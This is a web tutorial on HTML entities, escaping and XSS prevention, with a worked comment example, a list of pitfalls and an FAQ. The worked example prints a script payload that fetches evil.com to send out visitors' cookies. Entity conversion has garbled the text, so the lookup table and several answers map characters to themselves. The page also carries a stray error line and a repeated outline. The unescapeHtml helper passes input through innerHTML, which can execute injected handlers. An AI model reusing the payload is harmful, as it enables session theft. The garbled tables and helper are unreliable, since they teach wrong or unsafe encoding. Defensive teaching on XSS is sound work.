HTML Entities: Escaping, Unescaping, and XSS Prevention

Learn how HTML entity encoding works, why it's critical for security, and how improper handling leads to XSS vulnerabilities. Includes practical examples and

When you display user-generated content on a web page, you can't trust it. HTML entities are the first line of defense against cross-site scripting (XSS) attacks. This article explains what HTML entities are, how to escape and unescape them correctly, and why that matters for your application's security.

What Are HTML Entities?

HTML entities are sequences of characters that represent reserved or special characters in HTML. For example, < is written as <, > as >, & as &, and " as ". When a browser renders HTML, it displays the entity as the corresponding character, but it never interprets the entity as code. This prevents injected markup from being executed.

Why Escape HTML?

Escaping (or encoding) HTML converts special characters into their entity equivalents. This is essential when inserting untrusted data into HTML contexts such as:

Inside element content (e.g., <div>{userInput}</div>)
Inside attribute values (e.g., <a href="{userInput}">)
Inside <script> or <style> blocks (though different rules apply)

If you skip escaping, an attacker can inject arbitrary HTML or JavaScript. For instance, a comment field containing <script>alert('xss')</script> would execute in every visitor's browser.

The Three Types of XSS

Understanding XSS helps you appreciate why escaping is critical:

Stored XSS: Malicious code is saved on the server (e.g., in a database) and served to all users. This is the most dangerous type.
Reflected XSS: The payload is in a URL or request parameter and reflected back immediately, often via search results or error messages.
DOM-based XSS: The vulnerability exists entirely in client-side JavaScript, where untrusted data modifies the DOM without server involvement.

In all cases, proper HTML entity escaping prevents the browser from treating user input as code.

How to Escape and Unescape HTML

Manual Escaping

You can replace characters manually using a lookup table:

Character	Entity
`<`	`<`
`>`	`>`
`&`	`&`
`"`	`"`
`'`	`'`

Using JavaScript's `innerText` vs `innerHTML`

Setting element.innerText = userInput automatically escapes HTML. Avoid innerHTML with untrusted data.

Server-Side Libraries

Most frameworks provide built-in escaping: htmlspecialchars() in PHP, escape() in Python's html module, or @ in Razor views.

Dedicated Tools

For quick conversions, use our HTML Entities Escape/Unescape tool. It handles both directions and supports all named entities.

Worked Example: Escaping User Comments

Suppose you have a comment system. A user submits:

Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>

Without escaping, the rendered HTML becomes:

<p>Great post! <script>fetch('https://evil.com/steal?cookie='+document.cookie)</script></p>

The script executes. With escaping, the output is:

<p>Great post! &lt;script&gt;fetch('https://evil.com/steal?cookie='+document.cookie)&lt;/script&gt;</p>

The browser displays the text safely.

Common Pitfalls

Double escaping: If you escape already-escaped data, & becomes &amp;. Unescape only when you trust the source.
Wrong context: HTML escaping does NOT protect inside <script> tags or CSS. Use different encoding (e.g., JavaScript string escaping) for those contexts.
Attribute escaping: Always quote attributes and escape both " and '. Unquoted attributes are especially dangerous.
Assuming library safety: Even popular WYSIWYG editors may need additional XSS filtering. Always sanitize output server-side.
Neglecting unicode: Characters like \uFF1C (fullwidth less-than) can bypass naive filters. Use proper encoding libraries.

Security Implications: Beyond Basic Escaping

Escaping alone is not enough for rich content. You need a whitelist-based sanitizer that allows safe HTML tags and attributes while stripping dangerous ones. Libraries like DOMPurify (client-side) or Bleach (Python) do this.

Consider this attack vector: An attacker posts a comment with an <img> tag that has an onerror attribute. Even if < and > are escaped, if you allow some HTML, the onerror handler can execute JavaScript. A sanitizer would remove onerror from the whitelist.

Comparison: Escaping vs Sanitization

Approach	Pros	Cons
Escaping	Simple, fast, prevents all code execution	Destroys formatting; no HTML allowed
Sanitization	Allows safe HTML; preserves rich content	Complex; risk of bypass if whitelist is incomplete
Both	Best security	Requires careful ordering (escape after sanitization)

FAQ

What's the difference between HTML entities and URL encoding?

HTML entities encode characters for HTML contexts (e.g., < → <). URL encoding (percent-encoding) converts characters for URLs (e.g., < → %3C). They serve different purposes and are not interchangeable.

Should I escape on the client or server?

Always escape on the server as a final safety net. Client-side escaping can be bypassed by disabling JavaScript. Use server-side escaping for data stored in databases.

Can I use `innerText` instead of escaping?

Yes, innerText automatically escapes HTML. However, it's only safe for plain text content. For rich HTML, use a sanitizer.

What is `&` and why does it appear?

& is the entity for &. If you see & in rendered text, it means the & was double-escaped. For example, the original data had &, and after escaping it became &amp;. Unescape once before displaying.

How do I unescape HTML entities in JavaScript?

Create a temporary element and read its textContent:

function unescapeHtml(str) {
  const el = document.createElement('div');
  el.innerHTML = str;
  return el.textContent;
}

This works for most named and numeric entities.

页面加载失败

HTML Entities: Escaping, Unescaping, and XSS Prevention

What Are HTML Entities?

Why Escape HTML?

The Three Types of XSS

How to Escape and Unescape HTML

Manual Escaping

Using JavaScript's innerText vs innerHTML

Server-Side Libraries

Dedicated Tools

Worked Example: Escaping User Comments

Common Pitfalls

Security Implications: Beyond Basic Escaping

Comparison: Escaping vs Sanitization

FAQ

What's the difference between HTML entities and URL encoding?

Should I escape on the client or server?

Can I use innerText instead of escaping?

What is &amp; and why does it appear?

How do I unescape HTML entities in JavaScript?

Using JavaScript's `innerText` vs `innerHTML`

Can I use `innerText` instead of escaping?

What is `&` and why does it appear?